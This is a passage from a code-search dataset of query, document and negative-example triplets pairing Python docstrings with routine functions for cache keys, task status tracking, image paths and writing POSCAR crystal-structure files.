"def _blacklist_cache_key(t):\n key_data = 'blacklist%(s_data)s' % {\n 's_data': t\n }\n if six.PY3:\n key_data = key_data.encode('utf-8')\n\n key = hashlib.sha1()\n key.update(key_data)\n return key.hexdigest()",
"def _hash_flow(self, flow: Flow) -> str:\n prefect_version = Version(prefect.__version__)\n\n if prefect_version < parse(\"0.15.0\"):\n tenant_id = Client()._active_tenant_id # type: ignore # pylint: disable=no-member\n else:\n tenant_id = Client().tenant_id # type: ignore\n\n identifying_content = [\n self.prefect_cloud_project_name,\n flow.name,\n tenant_id,\n ]\n hasher = hashlib.sha256()\n hasher.update(cloudpickle.dumps(identifying_content))\n return hasher.hexdigest()",
"def _build_cache_key(self, *args):\n return self.key if not self.key_mod else self.key % tuple(args)",
"def compute_hash(self) -> str:\n # Replace dependencies with their hashes and functions with source.\n computation = self._subs_dependencies_with_hash(self.computation)\n computation = self._subs_tasks_with_src(computation)\n # Return the hash of the resulting computation.\n comp_hash: str = joblib.hash(cloudpickle.dumps(computation))\n return comp_hash",
"def _get_cache_key(self, **kwargs):\n key = 'cartodb_%s_' % _geohash.encode(\n kwargs.pop('lat'), kwargs.pop('lon'))[:8]\n key += '_'.join([\n '%s=%s' % (k, kwargs[k]) for k in sorted(kwargs.iterkeys())])\n return key",
"def _tuple_to_cache_key(t):\n key_data = '(%(s_data)s)' % {\n 's_data': ','.join(t)\n }\n if six.PY3:\n key_data = key_data.encode('utf-8')\n\n key = hashlib.sha1()\n key.update(key_data)\n return key.hexdigest()",
"def as_cache_key(self, ireq):\n extras = tuple(sorted(ireq.extras))\n if not extras:\n extras_string = \"\"\n else:\n extras_string = \"[{}]\".format(\",\".join(extras))\n name = _key_from_req(ireq.req)\n version = get_pinned_version(ireq)\n return name, \"{}{}\".format(version, extras_string)",
"def _getTaskName(self, taskClass, kwargs):\n className = taskClass\n suffix = kwargs.pop('taskName', None)\n if suffix:\n className += '-' + suffix\n elif kwargs == {}:\n # Ok, don't add any suffix.\n pass\n else:\n m = hashlib.sha256()\n m.update(repr(kwargs))\n className += '-' + m.hexdigest()\n return className",
"def __get_task_cache(self, task: str, client: str):\n # Prevents execution if we are in a different version than v10 of Automation Anywhere Control Room\n if self.automation_anywhere_version != 'v10':\n return -1\n fname = task.split('\\\\')[-1]\n self.__logger.debug('Looking for cache for task \\'{fname}\\''.format(fname=fname))\n query = 'select trd.Id as id from TaskRunDetails trd, Tasks t, Clients c, Users u where\t' \\\n 'trd.TaskId=t.id and trd.ClientId=c.id and trd.UserId=u.id and ClientStatus=0 and IsTaskExecutionCompleted=0 and ' \\\n 'u.UserName=\\'{username}\\' and c.HostName=\\'{client}\\' and t.FileName=\\'{filename}\\''.format(username=self.__username,\n client=client,\n filename=fname\n )\n try:\n row = self.__database_conn.execute(query).fetchall()\n cache = []\n for r in row:\n cache.append(r['id'])\n if len(cache) > 0:\n self.__logger.debug('Got cache ids: {cache}'.format(cache=','.join([str(x) for x in cache])))\n return cache\n return None\n except Exception as error:\n self.__logger.error('Unable to execute query {query}:{err}'.format(query=query, err=error))\n raise",
"def __cache_key__(*args, **kwargs):\n return args_to_key(base, args, kwargs, False)",
"def sync_check_hash(task, force=False, job_id=None):\n set_thread_data(job_id)\n logger = get_logger()\n if force is True:\n return\n with sqla_session() as session:\n stored_hash = Device.get_config_hash(session, task.host.name)\n if stored_hash is None:\n return\n\n task.host.open_connection(\"napalm\", configuration=task.nornir.config)\n res = task.run(task=napalm_get, getters=[\"config\"])\n task.host.close_connection(\"napalm\")\n\n running_config = dict(res.result)['config']['running'].encode()\n if running_config is None:\n raise Exception('Failed to get running configuration')\n hash_obj = sha256(running_config)\n running_hash = hash_obj.hexdigest()\n if stored_hash != running_hash:\n raise Exception('Device {} configuration is altered outside of CNaaS!'.format(task.host.name))"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Checks the current status of an assembling task. Returns a tuple in the form ``(status, details)``, where ``status`` is the ChunkFileState, and ``details`` is either None or a string containing a notice or error message.
|
def get_assemble_status(task, scope, checksum):
cache_key = _get_cache_key(task, scope, checksum)
rv = default_cache.get(cache_key)
if rv is None:
return None, None
return tuple(rv)
|
[
"def build_status():\r\n from SCons.Script import GetBuildFailures\r\n bf = GetBuildFailures()\r\n if bf:\r\n # bf is normally a list of build failures; if an element is None,\r\n # it's because of a target that scons doesn't know anything about.\r\n status = 'failed'\r\n failures_message = \"\\n\".join([\"Failed building %s\" % bf_to_str(x)\r\n for x in bf if x is not None])\r\n else:\r\n # if bf is None, the build completed successfully.\r\n status = 'ok'\r\n failures_message = ''\r\n return (status, failures_message)",
"def get_successful_completion(status, msg):\n if status:\n raise Exception(\n \"The workflow did not complete successfully, \"\n \"or there is nothing to be done (all expected outputs have been produced).\"\n )\n else:\n print(msg)",
"def test_get_task_status(self):\n pass",
"def status(self, result, config=None):\r\n return result['status']",
"def import_status(self):\n result = self.__get_object('imports', None, None)\n if not 'status' in result:\n self.log.error(\"Unable to find 'status' key in result: %s\" % (result))\n return None \n elif not result['status'] in ['ready', 'queued', 'processing', 'succeeded', 'failed' ]:\n self.log.error(\"Unexpected status '%s' for import status. Check API and update library. Result = %s\" % (status, result))\n return None\n return result",
"def status_detail(self):\n if self.is_successful():\n return \"Status was OK, no details\"\n else:\n return self._response['StatusDetail']",
"def status(self):\n _id = self.pk\n version_id = self.version.pk\n done = self.done\n steps = [\"Parsing\", \"Preprocessing\", \"Processing\", \"Saving\"]\n result_url = \"/api/job/{}/result\".format(_id) if done else None\n progress = {\n 'step': len(steps) if done else 0,\n 'max_step': len(steps),\n 'step_progress': 1,\n 'total_progress': 1 if done else 0,\n 'done': done\n }\n # If the job is happening, we need to obtain the async task's information\n if self._current and self._current.status == 'PROGRESS':\n step = self._current.info.step\n progress = {\n 'step': step,\n 'max_step': len(steps),\n 'step_progress': 0,\n 'total_progress': float(step) / float(len(steps)),\n 'done': False\n }\n else:\n return {\n 'job_id': _id,\n 'version_id': version_id,\n 'steps': steps,\n 'result_url': result_url,\n 'progress': progress\n }",
"def status(self):\n\t\tif self.canceling:\n\t\t\treturn \"%s: canceling\" % self.title\n\t\telse:\n\t\t\treturn \"%s: %s\" % (self.title,\n\t\t\t\t\t\tself._internalTask.status)",
"def get_task_status(self, name, machine):\n item = self._get_task_item(name, machine)\n if item:\n return item['status']\n return None",
"def status(self):\n if self.failures > 0:\n return \"partial\"\n else:\n return \"success\"",
"def task_check(self,tid):\n#\t\tprint \"task_check \",tid\n\t\ttry :\n\t\t\ttask=self.active[tid]\n\t\t\tif task==None: raise Exception\n\t\texcept:\n\t\t\ttask=self.complete[tid]\t\t# if we succeed in retrieving it from the complete list, it's done (or aborted)\n\t\t\treturn 100\n\n\t\tif task.starttime==None or task.starttime<1 : return -1\n\t\tif task.progtime==None : return 0\n\t\treturn task.progtime[1]",
"def get_upload_status(uploadId=None):\n pass",
"def retrieve_status(fname, task_name):\n tasks, events, params = read_task_db(fname)\n\n task = tasks[tasks.name == task_name]\n l1_datasets = params[params.name == 'level1']\n\n # event status for the DataStandardisation Task\n status = task.merge(events, how='left', left_on='id', right_on='task_id',\n suffixes=['_{}'.format(task_name), '_events'])\n\n # final status for each DataStandardisation Task\n final_status = status.drop_duplicates('id_{}'.format(task_name),\n keep='last')\n\n # get the DONE, FAILED & PENDING Tasks\n # (if the task status is PENDING:\n # then the compute job could've timed out\n # or\n # an upstream dependency failed for some reason\n done = final_status[final_status.event_name == 'DONE']\n fail = final_status[final_status.event_name == 'FAILED']\n pending = final_status[final_status.event_name == 'PENDING']\n\n l1_done = done.merge(l1_datasets, how='left', right_on='task_id',\n left_on='id_{}'.format(task_name))\n l1_fail = fail.merge(l1_datasets, how='left', right_on='task_id',\n left_on='id_{}'.format(task_name))\n l1_pending = pending.merge(l1_datasets, how='left', right_on='task_id',\n left_on='id_{}'.format(task_name))\n\n return l1_done, l1_fail, l1_pending",
"def parse_cobalt_step_status(output: str, step_id: str) -> str:\n status = \"NOTFOUND\"\n for line in output.split(\"\\n\"):\n fields = line.split()\n if len(fields) >= 2:\n if fields[0] == step_id:\n status = fields[1]\n break\n return status",
"def parseStatus(self):\n if self.parseSuccessful:\n self.completionMessage += \"\\nvalue: \" + str(self.tree.value()) + \\\n \"\\nPreorder: \" + self.tree.prefix() + \\\n \"\\nInorder: \" + self.tree.infix() + \\\n \"\\nPostorder: \" + self.tree.postfix()\n return self.completionMessage",
"def get_status(self):\n return self.client.get_asg_ready(self.env, self.name)",
"def do_status(self):\n return \"Waiting for {0.prefill_in} frames; Streaming from ffmpeg: {0.ffmpeg_ready}\".format(self)",
"def dms_check_task_status(**kwargs):\n dms_task_name = 'example-task'\n\n try:\n task = dms_client.describe_replication_tasks(\n Filters=[{'DMS task name': 'replication-task-id','Values': [dms_task_name]}]\n )['ReplicationTasks'][0]\n\n logger.info(f\"Task name: '{task['ReplicationTaskIdentifier']}'. Status: {task['Status']}\")\n\n if task['Status'] == 'stopped':\n logger.info(f\"DMS task name: {task['ReplicationTaskIdentifier']}. Status: {task['Status']}. Reason: {task['StopReason']}\")\n \n return task\n\n except:\n logger.info(f\"ERROR checking the status of the task: {dms_task_name}. Please check.\")\n\n return",
"def _get_status(args, item):\n func = args.split('|')[-1][1:]\n if not item['result']:\n result = 'ERROR'\n elif func in PRESENT_FUNCS:\n result = \"PRESENT\"\n elif func in ABSENT_FUNCS:\n result = \"ABSENT\"\n else:\n # As we iterate on the Sal managed item statuses, just assume\n # that if it isn't an error, and not an \"ABSENT\", that it is\n # successful and should be considered \"PRESENT\" for lack of\n # something more accurate; e.g. longterm it will probably be\n # either whatever str you want to use for status, or something\n # more indicative of desired state; Okay/Error/Pending/Changed?\n result = \"PRESENT\"\n return result"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Updates the status of an assembling task. It is cached for 10 minutes.
|
def set_assemble_status(task, scope, checksum, state, detail=None):
cache_key = _get_cache_key(task, scope, checksum)
default_cache.set(cache_key, (state, detail), 600)
|
[
"def update_task_state():\n task_data = json.loads(request.data)\n task_id = task_data['taskId']\n task_to_update = Task.query.get(task_id)\n\n if task_to_update: \n task_to_update.finished = not task_to_update.finished\n db.session.commit()\n \n return jsonify({})",
"def update_task_status(registered_task_name, status):\n\n if status == Task.IN_PROGRESS:\n Task.objects.filter(registered_task__task_name=registered_task_name).update(\n status=status, started_at=datetime.now(timezone.utc))\n elif status in {Task.SUCCESS, Task.FAILED}:\n Task.objects.filter(registered_task__task_name=registered_task_name).update(\n status=status, finished_at=datetime.now(timezone.utc))\n else:\n Task.objects.filter(registered_task__task_name=registered_task_name).update(\n status=status, started_at=None, finished_at=None)",
"def update_task_state(self, result=None, task_status=TaskState.RUNNING.value, task_uid=None):\n result = result or {}\n\n try:\n if task_uid:\n self.task = get_export_task_record(task_uid)\n celery_uid = self.request.id\n if not celery_uid:\n raise Exception(\"Failed to save celery_UID\")\n self.task.celery_uid = celery_uid\n result = parse_result(result, \"status\") or []\n if TaskState.CANCELED.value in [self.task.status, self.task.export_provider_task.status, result]:\n logging.info(\"canceling before run %s\", celery_uid)\n self.task.status = TaskState.CANCELED.value\n self.task.save()\n raise CancelException(task_name=self.task.export_provider_task.name)\n # The parent ID is actually the process running in celery.\n self.task.pid = os.getppid()\n if task_status:\n self.task.status = task_status\n if TaskState[task_status] == TaskState.RUNNING:\n self.task.export_provider_task.status = TaskState.RUNNING.value\n self.task.export_provider_task.run.status = TaskState.RUNNING.value\n # Need to manually call to trigger method overrides.\n self.task.save()\n self.task.export_provider_task.save()\n self.task.export_provider_task.run.save()\n logger.debug(\"Updated task: {0} with uid: {1}\".format(self.task.name, self.task.uid))\n except DatabaseError as e:\n logger.error(\"Updating task {0} state throws: {1}\".format(self.task.uid, e))\n raise e",
"def task_updated(event: Event):\n data = {\"status\": event.get(\"state\", \"RUNNING\")}\n\n # Rather than send all data, only pass on known fields\n for field in [\"log\", \"urls\"]:\n value = event.get(field)\n if value:\n data.update({field: value})\n\n update_job(event[\"task_id\"], data)",
"def sde_update_task_status(self, task, status):\n if not self.sde_plugin:\n raise AlmException('Requires initialization')\n\n logger.debug('Attempting to update task %s to %s' % (task['id'], status))\n\n try:\n self.sde_plugin.api.update_task_status(task['id'], status)\n except APIError, err:\n logger.error(err)\n raise AlmException('Unable to update the task status in SD '\n 'Elements. Either the task no longer '\n 'exists, there was a problem connecting '\n 'to the server, or the status was invalid')\n logger.info('Status for task %s successfully set in SD Elements' % task['id'])\n\n note_msg = 'Task status changed to %s via %s' % (status, self.alm_name)\n try:\n self._add_note(task['id'], note_msg, '', status)\n except APIError, err:\n logger.error('Unable to set a note to mark status '\n 'for %s to %s. Reason: %s' % (task['id'], status, str(err)))",
"def updateGCITask(self, request, id, *args, **kwargs):\n id = int(id)\n\n task = GCITask.get_by_id(id)\n\n if not task:\n # invalid task data, log and return OK\n return error_handler.logErrorAndReturnOK(\n 'No GCITask found for id: %s' % id)\n\n task_logic.updateTaskStatus(task)\n\n return http.HttpResponse()",
"def update(self, task):\n\t\tself.tasks.append(db.Text(task))\n\t\treturn self",
"def update_complete_tasks(self, state: State):\n next_state = state #.copy()\n completed_tmp = []\n for task_id in next_state.tasks_ongoing:\n if next_state.tasks_progress[task_id] >= 0.9999:\n next_state.tasks_progress[task_id] = 1\n completed_tmp.append(task_id)\n for completed_task in completed_tmp:\n next_state.tasks_complete.add(completed_task)\n next_state.tasks_ongoing.remove(completed_task)\n for res in next_state.resource_used_for_task[completed_task]:\n res_consumption = next_state.resource_used_for_task[completed_task][res]\n if self.is_renewable(res):\n next_state.resource_used[res] -= res_consumption\n next_state.resource_used_for_task.pop(completed_task)\n next_state.tasks_details[completed_task].end = next_state.t+1\n # WARNING : considering how it's coded, we should put +1 here. could be ccleaner if it was done in the update_progress.\n\n return next_state",
"def onboard_task_update(context, task_id, values, session=None):\n values = dict([(k, v) for k, v in values.iteritems() if v is not None])\n status = values.get('status', '')\n #If this is a final status, then set the end date/time\n if status == 'completed' or status == 'failed':\n values['ended'] = timeutils.utcnow()\n if not session:\n session = nova_db_sa_api.get_session()\n with session.begin():\n query = model_query(\n context, pvc_models.OnboardTaskDTO, session=session)\n task_ref = query.filter_by(id=task_id).first()\n task_ref.update(values)\n task_ref.save(session=session)\n return task_ref",
"def mongo_update_task(job_id, task_id, aic, bic, labels, elapsed_time, elapsed_read_time, elapsed_processing_time):\n response = mongo.db.tasks.update_one(\n {'job_id': job_id, 'task_id': task_id},\n {'$set': {'task_status': 'done', 'aic': aic, 'bic': bic, 'labels': labels,\n 'elapsed_time': elapsed_time, 'elapsed_read_time': elapsed_read_time,\n 'elapsed_processing_time': elapsed_processing_time}})\n return response",
"def startUpdatingTask(task, transactional=False):\n url = '/tasks/gci/ranking/update'\n params = {\n 'id': task.key().id_or_name()\n }\n taskqueue.add(queue_name='gci-update', url=url, params=params,\n transactional=transactional)",
"def runATask(self,task : TaskInformation):\n if self.deviceLock.acquire():\n try:\n for device in task.devices:\n task.status = \"Running\"\n self.devices[device].addATask(task)\n finally:\n self.deviceLock.release()",
"def on_success(self, retval, celery_task_id, args, kwargs):\n kt_id = args[2]\n #update in SUCCESS status\n kt = KnapsackTask.objects.get(id=kt_id)\n kt.celery_task_id = celery_task_id\n kt.status = 'SUCCESS'\n kt.done = True\n kt.result_value = retval[0]\n kt.result_weight = retval[1]\n kt.result_items = retval[2]\n kt.task_solve_start = retval[3]\n kt.task_solve_end = retval[4]\n kt.task_solution_duration = retval[4] - retval[3]\n kt.task_total_duration = retval[4] - kt.task_created\n kt.save()",
"def reopen_task(self):\r\n if self.cal_event_list:\r\n # tracked_duration > 0\r\n self.task_status = STATUS_IN_PROGRESS\r\n else:\r\n self.task_status = STATUS_PENDING",
"def task_status(task_id):\n logger.info(\"Consulting task status ...\")\n task = Task(task_id)\n if not task.status:\n raise AppError(\"task_error\",\"Task not found!\")\n\n _status = task.status\n _status['celery_status'] = None\n try:\n logger.info(\"Getting status..\")\n celery_task = celery_app.AsyncResult(task_id)\n #celery_task = eval(\"{}_task.AsyncResult('{}')\".format(task.name, task_id))\n _status['celery_status'] = celery_task.state \n except Exception as e:\n logger.error(e)\n logger.info(\"Serving status!\")\n return jsonify(_status)",
"def task_status_changed(sg, logger, event, args):\n\n # Return if we don't have all the field values we need.\n if (\n not event.get(\"entity\", {}).get(\"id\")\n or not event.get(\"meta\", {}).get(\"entity_id\")\n or not event.get(\"id\")\n ):\n return\n\n # Make some vars for convenience.\n entity_id = event[\"entity\"][\"id\"]\n entity_name = event[\"entity\"][\"name\"]\n status_mapping_field = args[\"status_mapping_field\"]\n\n # Re-query for the Task Status value to make sure we have an up-to-date\n # new status value. The input value from the event may be inaccurate if the\n # triggers are ever running behind.\n sg_task = sg.find_one(\"Task\", [[\"id\", \"is\", entity_id]], [\"sg_status_list\"])\n\n # Return if we can't find our Task.\n if not sg_task:\n logger.info(\n \"Unable to retrieve Task (%d) %s from SG for event %d, skipping.\"\n % (entity_id, entity_name, event[\"id\"])\n )\n return\n\n # Grab the Shotgun Status entity the Task was set to.\n new_task_status = sg.find_one(\n \"Status\",\n [[\"code\", \"is\", sg_task[\"sg_status_list\"]]],\n [status_mapping_field],\n )\n\n # Return if we can't find our Status entity (would be pretty weird).\n if not new_task_status:\n logger.info(\n \"No Status found with code %s, skipping.\" % sg_task[\"sg_status_list\"]\n )\n return\n\n # Return if the Status entity's sg_version_status_mapping value is empty.\n if new_task_status[status_mapping_field] is None:\n logger.debug(\n \"No sg_version_status_mapping found for Status with id %s, skipping.\"\n % new_task_status[\"id\"]\n )\n return\n\n # Get the latest Version attached to our Task.\n sg_version = sg.find_one(\n \"Version\",\n [[\"sg_task\", \"is\", sg_task]],\n [],\n order=[{\"field_name\": \"created_at\", \"direction\": \"desc\"}],\n )\n\n # Return if we can't find a Version attached to the Task.\n if not sg_version:\n logger.debug(\"No Version linked to Task with id %s, skipping.\" % entity_id)\n return\n\n # Update the Version's sg_status_field with the Status entity's\n # sg_version_status_mapping value.\n try:\n result = sg.update(\n \"Version\",\n sg_version[\"id\"],\n {\"sg_status_list\": new_task_status[status_mapping_field]},\n )\n logger.debug(\"Result is: %s\" % result)\n except Exception as e:\n logger.warning(\n \"Could not update Version with id %s to Status %s: %s\"\n % (sg_version[\"id\"], new_task_status[status_mapping_field], str(e))\n )",
"def task_done(self, tid):\n\t\tEMTaskQueue.lock.acquire()\n\t\ttry:\n\t\t\ttask=self.active[tid]\n\t\t\tif task==None:\n\t\t\t\tprint \"*** Warning, task %d was already complete\"%tid\n\t\t\t\tEMTaskQueue.lock.release()\n\t\t\t\treturn\n\t\texcept:\n\t\t\tEMTaskQueue.lock.release()\n\t\t\treturn\n\n\t\ttask.progtime=(time.time(),100)\n\t\ttask.endtime=time.time()\n\t\tself.complete[tid]=task\n\t\tdel self.active[tid]\n\t\tEMTaskQueue.lock.release()\n\t\t#if self.complete[\"max\"]<tid : self.complete[\"max\"]=tid\n\t\t#self.active[\"min\"]=min(self.active.keys())",
"def update_tasks(self, name, status, machines=None):\n if name in self.tasks:\n for task in self.tasks[name]:\n if not machines or task['machine'] in machines:\n task['status'] = status",
"def cmd_task_update_state(self, args):\n task_id = args[0]\n state = args[1]\n data = {'state': state}\n self._update_obj(task_id, 'task', data)"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Return percentage of background annotations.
|
def bg_perc(self):
if self._bg_perc is None and self.task == 'preddet':
return 0.0
if self._bg_perc is None:
return 1.0
return self._bg_perc
|
[
"def getSegmentationProgessInPercentage(self) -> int:\n segmentedCount = self.getNumOfSegmented()\n float_Num = segmentedCount / self.getTotalNumImages()\n return int(float_Num * 100)",
"def get_background(self):\r\n\r\n\t\tif len(self) > 0:\r\n\t\t\tglobal_bg = np.array([0] * len(self[0].bg), dtype=float)\r\n\t\telse:\r\n\t\t\treturn None\r\n\r\n\t\ttotal_n = 0\r\n\t\tfor motif in self:\r\n\t\t\tglobal_bg += motif.bg * motif.n\r\n\t\t\ttotal_n += motif.n\r\n\r\n\t\treturn global_bg / total_n",
"def percent(x):\n return width(x) / center(x) * 100",
"def calc_background(self, tth):\n background = self._p_background\n int_bkgd = background.interpolate_by_points(tth)\n return int_bkgd",
"def avg_num_annotations_per_annotator(self):\n return self.num_units / self.num_annotators",
"def overall_percentage(self):\n return self._overall_percentage",
"def total_percentage(self) -> float:\n return (\n (self._pct / float(self._num_phases) +\n (100.0 * float(self._cur_phase) / float(self._num_phases))))",
"def get_n_perc(self,seq):\n\t\tn_count = float(str(seq).upper().count('N'))\n\t\treturn n_count / len(seq) * 100",
"def aln_read_coverage_fraction(HTSeq_alignment, percent_string=False):\n s, e = aln_read_coverage(HTSeq_alignment)\n fraction = (e-s)/len(HTSeq_alignment.read.seq)\n if percent_string: return \"%.0f%%\"%(fraction*100)\n else: return fraction",
"def checkpoint_percentages(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[int]]]]:\n return pulumi.get(self, \"checkpoint_percentages\")",
"def percent(self) -> float:\n return (1.0 / self.maximum) * self.current",
"def _percentageOfGrid(self, percent):\n numSpecialPoints = int((self.numRows * self.numCols) * percent)\n return numSpecialPoints",
"def percent(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"percent\")",
"def get_percentage_text(self) -> str:\n return self._pct_text",
"def calculate_percent_follow_in_annual(annual_raster_path, fallow_in_annual_path):\n\n annual_pixels = get_annual_pixels(annual_raster_path)\n fallow_in_annual_pixels = get_fallow_in_annual_pixels(fallow_in_annual_path)\n\n percent_fallow_in_annual = 100 * (fallow_in_annual_pixels / annual_pixels)\n \n return(percent_fallow_in_annual)",
"def overallCodonPercent():\n count = overallCodonUse()\n total = sum(count)\n percent = [c/total for c in count]\n return percent",
"def ambient_humidity_percent(self) -> float:\n data = self._traits_data(HumidityMixin.NAME)\n return data[AMBIENT_HUMIDITY_PERCENT]",
"def patch_bk_ratio(img, bk_thresh=0.80):\n g_img = color.rgb2gray(img)\n bk_pixel_num = np.sum(g_img > bk_thresh)\n pixel_num = g_img.size\n background_ratio = bk_pixel_num / pixel_num\n return background_ratio",
"def get_hand_gradient_percentage(self, skeleton):\n return (skeleton.get_hand_gradient() * 100.0) / 2.0"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Return path of stored dataset images.
|
def orig_img_path(self):
_dataset = 'VG' if 'VG' in self.dataset else self.dataset
return osp.join(self.prerequisites_path, _dataset, 'images', '')
|
[
"def getDataPath(self, img): \n if self.__singleMode:\n return os.path.join(GG.utils.DATA_PATH, img)\n else:\n pathFile = os.path.join(GG.utils.LOCAL_DATA_PATH, img)\n if not os.path.isfile(pathFile):\n imgData = self.__system.getResource(img) \n if imgData:\n if not os.path.isdir(os.path.dirname(pathFile)):\n GG.utils.createRecursiveDir(os.path.dirname(pathFile))\n imgFile = open(pathFile, \"wb\")\n imgFile.write(imgData)\n imgFile.close()\n else:\n return GG.utils.IMG_ERROR\n return pathFile",
"def img_dir() -> Path:\n path = Path().resolve()\n return path / \"cellseg_models_pytorch/inference/tests/data\"",
"def _path(filename):\n fn = os.path.join(\"datasets\", filename)\n return [fn] if os.path.exists(fn) else []",
"def get_dataset_file_path() -> str:\n name = __DATASET_FILE__\n return os.path.join(get_project_root(), __COLOR_DATASET_FOLDER__ , name)",
"def path(self) -> str:\n return os.path.abspath(os.path.join(self.image_directory, self.filename))",
"def _getDataStorageDirectoryName(self):\n return self.COMPLEMENTARY_FILES",
"def get_dataset_dir():\n # current_dir = get_project_dir()\n # return os.path.join(current_dir, 'data')\n datadir_base = os.path.expanduser(os.path.join('~', '.keras'))\n return os.path.join(datadir_base, 'datasets')",
"def image_path(self) -> str:\r\n return path.join(self.output_path, \"image\")",
"def ai_data_directory(self) -> pathlib.Path:",
"def get_data_path():\n\n return DATA_PATH",
"def ds_to_db_path(cls, datastore):\n return os.path.join(\"/vmfs/volumes\", datastore, vmdk_ops.DOCK_VOLS_DIR, CONFIG_DB_NAME)",
"def storage_path(cls) -> str:\n return super().storage_path()",
"def dataset_files(self):\n return self._dataset_files",
"def store_path(self):\n return path_join(self.home, \"data\", \"databases\",\n self.get_config(\"dbms.active_database\", \"graph.db\"))",
"def _get_default_path(self):\n return os.path.join('/mnt/saturn/datasets/MSCOCO');",
"def get_path(filename, folder):\n return IMAGE_SET.path(filename, folder)",
"def get_data_files_path():\n return _os.path.dirname(_inspect.getfile(_sys._getframe(1)))",
"def blob_path(self) -> str:\n return pulumi.get(self, \"blob_path\")",
"def image_path_at(self, i):\n imgName = self.imgNames[self.image_id_at(i)]\n imgPath = osp.join(self.splitPath, \"image\", imgName)\n\n # print(\"Path:\\n\")\n # print(imgPath)\n\n return imgPath"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Return upper limit of examined relations in a train image.
|
def relations_per_img_limit(self):
return 2000
|
[
"def MaximumThreshold(self) -> int:",
"def upper_limit_points(self):\n return self._upper_limit_points",
"def max_size(self):\n return self.info_sliced.largest_intermediate",
"def getJointUpperLimit(self, jointName):\n return self.getJointInfo(jointName)[9]",
"def get_upperbound(self) -> int:",
"def getTargetMaximumNumberOfPageLOD(self):\r\n return _osgDB.DatabasePager_getTargetMaximumNumberOfPageLOD(self)",
"def max_node_capture_assists(self):\r\n return self.data.maxNodeCaptureAssist",
"def MaxBoundsY(self) -> float:",
"def max_ripples():\r\n return 8",
"def max_length(self) -> float:",
"def max_raindrops():\r\n return 100",
"def max_utility(self):\n return 100",
"def get_upper_bound(self) -> _ARRAY:\n return self._upper_bound",
"def getLMax(self,maxLmax=10):\n return min( max( [ 2*xL['L'] for xL in self.Ls ] ), maxLmax )",
"def upper_limit_value(self):\n return self._upper_limit_value",
"def blobs_max(self):\n ret_val = self._blobs_max()\n return ret_val",
"def rebounds_max(self):\n if self._games is None:\n raise TypeError('games has not been set')\n return self._games['rebounds'].max()",
"def maxParallax():\n return self.upParallax",
"def PreviewUpperLimit(self):\n if self.force_auto_sync:\n self.get('PreviewUpperLimit')\n return self._PreviewUpperLimit"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Write the contents of poscar to filename.
|
def write_POSCAR(poscar,filename):
global hashes
f=StringIO()
f.write("1.0\n")
for i in range(3):
f.write("{0[0]:>20.15f} {0[1]:>20.15f} {0[2]:>20.15f}\n".format(
(poscar["lattvec"][:,i]).tolist()))
f.write("{0}\n".format(" ".join(poscar["elements"])))
f.write("{0}\n".format(" ".join([str(i) for i in poscar["numbers"]])))
f.write("Direct\n")
for i in range(poscar["positions"].shape[1]):
f.write("{0[0]:>20.15f} {0[1]:>20.15f} {0[2]:>20.15f}\n".format(
poscar["positions"][:,i].tolist()))
if hashes:
header=hashlib.sha1(f.getvalue().encode()).hexdigest()
else:
header=filename
with open(filename,"w") as finalf:
finalf.write("{0}\n".format(header))
finalf.write(f.getvalue())
f.close()
|
[
"def __writeToFile(self, score):\n with open(self.file, \"w\") as f:\n f.write(str(score))",
"def save(self, filename):\n\t\tself.getZ().write(filename)",
"def write_file(self, filepath, contents):\n with open(filepath, 'w') as f:\n f.write(contents.getvalue())",
"def to_file(filename, concordance):\n out = open(filename, 'w')\n out.write(to_string(concordance))\n out.close()",
"def writeOutput(message):\r\n try:\r\n print(message)\r\n fileOutput = open(HOME_FOLDER + \".pomobaroutput\", \"w\")\r\n fileOutput.write(message)\r\n fileOutput.close()\r\n except Exception as e:\r\n print(e)",
"def write_file(filename: str, contents: str) -> None:\n with open(filename, 'w') as f: f.write(contents)",
"def write_file(name, contents):\n with open(name, \"w\") as f:\n f.write(contents)",
"def _write(self, filename):\n\n loc = self.config[\"data_specs\"][\"out_loc\"] \n if \"s3://\" in loc.lower():\n s3 = boto3.resource('s3')\n splitted = loc.split(\"/\")\n bucket = splitted[2]\n key = \"/\".join(splitted[3:])\n key_divider = \"/\" if splitted[-1] else \"\"\n destination = \"{0}{1}{2}\".format(key, key_divider, filename)\n if filename.split(\".\")[-1] in [\"obj\", \"json\"]:\n with open(\"{0}/{1}\".format(tmpdir, filename), \"rb\") as data:\n s3.meta.client.upload_fileobj(data, bucket, destination)\n else:\n s3.meta.client.upload_file(\"{0}/{1}\".format(tmpdir, filename), bucket, destination)\n else:\n shutil.copyfileobj(\n open(\"{0}/{1}\".format(tmpdir, filename), \"rb\"), \n open(\"{0}/{1}\".format(\n loc[:-1] if loc[-1] == \"/\" else loc, \n filename), \"wb\")) \n os.remove(\"{0}/{1}\".format(tmpdir, filename))",
"def generate_POSCAR(formu,out_matrix,final_string,structure_string,material_id):\n out_name='POSCAR.'+material_id+'_'+formu\n out_name='POSCAR_files/'+out_name.replace(' ','')\n print(out_name)\n openfile = open(out_name,'wt')\n openfile.write(formu+'\\n')\n openfile.write('1.0'+'\\n')\n openfile.write(out_matrix+'\\n')\n openfile.write(final_string+'\\n')\n openfile.write('direct'+'\\n')\n openfile.write(structure_string+'\\n')\n openfile.close()",
"def write_to_files(self,catalog,input):\n\n\n\n metadata = self.metadata({'filename':self.uuid})\n catalog.write(json.dumps(metadata) + \"\\n\")\n text = self.parsed.get_payload().replace(\"\\n\",\"\\\\n\\\\n\").replace(\"\\t\",\" \")\n input.write(metadata['filename'] + \"\\t\" + text.encode(\"utf-8\",\"ignore\") + \"\\n\")",
